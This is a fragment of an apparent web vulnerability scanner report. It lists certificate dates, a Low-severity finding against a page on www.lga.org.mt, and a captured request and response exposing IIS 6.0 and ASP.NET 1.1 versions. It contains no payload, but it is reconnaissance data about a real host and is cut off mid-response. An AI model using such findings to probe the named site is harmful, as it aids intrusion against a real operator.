Valid from: | Tue Aug 05 19:00:00 CDT 2008 |
Valid to: | Sat Aug 06 18:59:59 CDT 2011 |
Issued to: | Thawte Premium Server CA |
Issued by: | Thawte Premium Server CA |
Valid from: | Wed Jul 31 19:00:00 CDT 1996 |
Valid to: | Fri Jan 01 17:59:59 CST 2021 |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.lga.org.mt |
Path: | /lga/content.aspx |
GET /lga/content.aspx?id Host: www.lga.org.mt Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 11:46:27 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 14976 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <HTML> <HEAD> <title>LGA :: Licensed Operators: Class 4 </title> <meta content= ...[SNIP]... <input type="hidden" name="__VIEWSTATE" value="dDwtMjA2NTI0ODY2Nzt0 |